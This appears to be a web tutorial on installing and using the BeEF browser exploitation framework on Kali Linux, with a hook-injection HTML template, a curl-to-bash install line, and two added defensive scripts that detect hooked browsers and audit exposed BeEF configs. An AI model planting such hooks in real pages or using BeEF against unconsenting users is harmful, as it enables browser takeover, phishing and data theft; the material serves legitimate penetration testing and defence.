Install BeEF on Kali Linux for Browser Security Assessment

Kali Linux offers many tools for hacking and pentesting. One of the best of these tools is BeEF. Note that BeEF is not installed by default in Kali Linux, but you can find it in the default repository and install it with the apt package manager. You will then see a web interface open on port 3000 to run the tests. This article walks you through all the steps to install BeEF on Kali Linux.

What Is BeEF on Kali Linux?

BeEF is the short form of “Browser Exploitation Framework” and is an open-source penetration testing tool designed to assess the security of web browsers. This tool is something similar to Metasploit on Kali Linux but focuses on web browsers.

It is primarily used by ethical hackers and security professionals to evaluate the vulnerability of web applications and the security of client-side systems. BeEF allows testers to demonstrate various client-side attacks and assess how well a target system can withstand these attacks. This type of attack works great for social engineering.

What Are the Significant Features of BeEF?

Here, you will find out some key features of BeEF:

  • BeEF provides a user-friendly web-based interface that allows penetration testers to control and interact with compromised browsers remotely. The interface makes it easy to manage and monitor compromised targets.
  • BeEF can be integrated with social engineering attacks to enhance its effectiveness. It can be used in phishing campaigns to compromise the browsers of unsuspecting users.
  • This great tool emphasizes the importance of client-side attacks, highlighting the risks associated with browser vulnerabilities.
  • BeEF comes equipped with a wide range of exploitation modules that can be used to target specific vulnerabilities in web browsers.
  • BeEF supports a wide range of web browsers, making it versatile for assessing the security of different browser types, including Chrome, Firefox, Safari, Internet Explorer, and more.
  • BeEF provides reporting and logging capabilities, allowing testers to document their findings and generate reports for clients or internal teams.
  • BeEF has an active and supportive community of users and contributors.
  • BeEF employs a technique known as “hooking” to compromise target browsers.
  • BeEF relies on JavaScript injection to compromise target browsers.

How to Install BeEF on Kali Linux?

You can install BeEF manually on your Linux VPS, depending on the Kali Linux version you have. Installing BeEF is straightforward. Here we will introduce you to the steps to install BeEF:

– The first step is updating the repositories info using the command below:

sudo apt update

Tip: If you were notified that upgrades are available, it is recommended to upgrade the system using the command below:

sudo apt upgrade

Installing the BeEF Package on Kali Linux

Now you can start installing BeEF with the following command:

sudo apt install beef-xss

All the required dependencies to use BeEF will be added automatically. This action will bring up a web interface, but you will need many additional packages. So keep reading!

How to Start the BeEF Service

Once you have installed BeEF, you can start the related service with this command:

sudo beef-xss

  • When you run BeEF for the first time, you may be prompted to set a default user password.
  • Any other warnings or errors are also displayed in this section.
  • The URL of the web interface will also be given to you. It is your IP address with port 3000.

Another option is to find BeEF in the main menu:

[Screenshot: start BeEF service]

Now you can use just one click to start or stop the service.

When you start the service, you can access the BeEF web interface at:

http://localhost:3000

Or, to access from another computer, use the following URL:

http://IP:3000

The login process will be like this:

[Screenshot: BeEF login page]

– Your default user name is “beef” and your password is the one you set while starting the service.

– When you have passed all these steps successfully, you will have a web interface. But we will use the demo so that you get to know more about this tool.

Getting Familiar with the Demo Page

BeEF uses demo pages to familiarize you with the working process of this tool, so it is better to pay attention to this section.

The first page of this tool is very simple. It is a text page with the BeEF logo:

[Screenshot: BeEF demo page]

Open the following URL in order to access it in your browser:

http://localhost:3000/demos/basic.html

When you open the page, you’ll see a new line under “Online Browsers” that corresponds to the tab you opened on the desktop.
All actions performed on this page are recorded and you can see them in the user interface. Below is a screenshot of the tests as an example:

[Screenshot: BeEF demo page]

BeEF can detect whether the tab is in focus, what we have typed in the form, and where we have clicked with the mouse. All of these actions are built in, and no other code is needed to collect the information.

BeEF can collect more general data about the user. These data can be:

  • Your device type
  • IP address
  • The information about the operating system
  • Other details about web browser
  • etc.

This tool works in such a way that even if the target only opens the page for a second, its information such as network, configuration, and the entire system will be available to you.

Testing the BeEF Service from Another Computer

After testing from Kali Linux, we will now test the BeEF tool from another computer:

The screenshot below shows that we accessed the page from a Windows computer, IP 192.168.***.**

[Screenshot: testing the BeEF service from another computer]

As you connect the browser to BeEF, you can use the commands available in this tab:

[Screenshot: testing the BeEF service from another computer]

This way, you can control the web browser on the remote computer. In this example, we redirected the browser to a specific URL. You can use many other commands to collect data.

Creating a Custom Page

The important thing is to create better pages that look familiar to the intended target. For example, this page can be the entry page for their main program. If you want to create custom pages in BeEF, you should create HTML pages in this directory:

/usr/share/beef-xss/extensions

There you can see the demo folder we have used before with an HTML subfolder.

To connect this page to BeEF, just create a traditional HTML page and then add the following JavaScript code in the header:

<script>
 var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';

   document.write(commandModuleStr);
</script>

The full page we used is shown here. If you wish, you can copy and paste this code as a template for your new page:

<html>
        <head>
                <title>Test page infosec</title>
                <script>
                var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
                document.write(commandModuleStr);
                </script>
        </head>
        <body>
        </body>
</html>
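
From the defender's side, the hook described above is visible in web proxy logs, because a hooked browser keeps requesting the hook script from the BeEF server. The following is an added example, not part of the original article or the BeEF project; it assumes BeEF's default hook file name (hook.js) and session parameter (BEEFHOOK), both of which can be changed in config.yaml, and a constructed log format of timestamp, client IP, method and URL.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumed BeEF defaults; both are configurable in config.yaml.
HOOK_PATH = "/hook.js"
SESSION_PARAM = "BEEFHOOK"

# Constructed proxy log lines: "<epoch seconds> <client ip> <method> <url>"
SAMPLE_LOG = """\
1700000000 192.168.56.20 GET http://192.168.56.10:3000/demos/basic.html
1700000001 192.168.56.20 GET http://192.168.56.10:3000/hook.js
1700000002 192.168.56.20 GET http://192.168.56.10:3000/hook.js?BEEFHOOK=constructedSessionId
1700000003 192.168.56.20 GET http://192.168.56.10:3000/hook.js?BEEFHOOK=constructedSessionId
1700000004 192.168.56.20 GET http://192.168.56.10:3000/hook.js?BEEFHOOK=constructedSessionId
1700000005 192.168.56.21 GET http://intranet.example/static/app.js
1700000006 192.168.56.21 GET http://cdn.example/js/hook.js
"""


def find_hooked_clients(log_text, min_polls=3):
    """Return {(client, server): poll_count} for clients that look hooked.

    A single fetch of a file named hook.js is weak evidence (the name is
    generic), so only repeated requests that carry the session parameter
    are reported.
    """
    polls = defaultdict(int)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        _ts, client, method, url = parts
        target = urlsplit(url)
        if method != "GET" or not target.path.endswith(HOOK_PATH):
            continue
        if SESSION_PARAM in parse_qs(target.query):
            polls[(client, target.netloc)] += 1
    return {key: n for key, n in polls.items() if n >= min_polls}


if __name__ == "__main__":
    for (client, server), n in find_hooked_clients(SAMPLE_LOG).items():
        print(f"{client} polled {server}{HOOK_PATH} {n} times")
```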

Finally, use this command if you want to stop this service:

sudo beef-xss-stop -h

Troubleshooting Some Common Issues of BeEF

Here are some common problems with BeEF on Kali Linux and their solutions:

1- Difficulty installing BeEF on Kali Linux due to missing dependencies or package conflicts.

Solution:

Ensure that your Kali Linux installation is up to date by running sudo apt update and sudo apt upgrade. Install any missing dependencies or packages as specified in the BeEF documentation or error messages.

2- BeEF may not work with the default Ruby version on Kali Linux.

Solution:

Use a Ruby version manager like RVM to install and manage the required Ruby version. BeEF typically works best with Ruby 2.5 or later. You can install RVM and the necessary Ruby version like this:

curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
rvm install 2.7.4
rvm use 2.7.4 --default

3- Database-related errors or connection issues when starting BeEF.

Solution:

Ensure your PostgreSQL or MySQL server is running and properly configured. Update BeEF’s database configuration in the config.yaml file to match your database settings.

4- BeEF may fail to bind to the desired IP address or port.

Solution:

Edit the config.yaml file to specify the correct IP address and port for BeEF to bind to. Ensure that the IP address is reachable and not blocked by firewalls.
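
Because the web interface answers on port 3000 to other computers, the bind address and the UI subnet restriction in config.yaml decide who can reach the admin panel. The following is an added example, not from the original article or the BeEF project, that flags wide-open values; the key names follow BeEF's stock config.yaml, the sample file is constructed, and the small parser is an assumption that handles only the simple nested key/value layout shown.

```python
import re

# Constructed excerpt in the layout of BeEF's stock config.yaml.
SAMPLE_CONFIG = """\
beef:
    credentials:
        user:   "beef"
        passwd: "constructed-password"
    restrictions:
        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
    http:
        host: "0.0.0.0"
        port: "3000"
"""


def flatten(text):
    """Flatten indentation-nested 'key: value' lines into dotted keys."""
    stack, flat = [], {}
    for raw in text.splitlines():
        line = raw.split(" #")[0].rstrip()  # drop trailing comments
        m = re.match(r"^(\s*)([\w-]+):\s*(.*)$", line)
        if not m:
            continue
        indent, key, value = len(m.group(1)), m.group(2), m.group(3)
        while stack and stack[-1][0] >= indent:
            stack.pop()  # leave deeper or sibling sections
        stack.append((indent, key))
        if value:
            flat[".".join(k for _, k in stack)] = value
    return flat


def audit(text):
    """Return findings about who can reach the BeEF admin interface."""
    cfg, findings = flatten(text), []
    host = cfg.get("beef.http.host", "").strip('"\'')
    ui = re.findall(r'"([^"]+)"', cfg.get("beef.restrictions.permitted_ui_subnet", ""))
    if host in ("0.0.0.0", "::"):
        findings.append("http.host binds every interface")
    if any(net in ("0.0.0.0/0", "::/0") for net in ui):
        findings.append("permitted_ui_subnet allows any source address")
    return findings
```

A finding here is not necessarily an error: the remote-computer test in this article needs the hook reachable from the lab network, but the admin UI can still be limited to the tester's own address through permitted_ui_subnet.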

Conclusion

BeEF is a penetration testing tool that allows you to control and interact with web browsers on remote systems, and can be useful for testing and demonstrating various web vulnerabilities. Here we tried to give you a complete guide to install BeEF on Kali Linux. Follow the steps to have a hassle-free installation process. Leave a comment if you encounter any problems. Happy coding!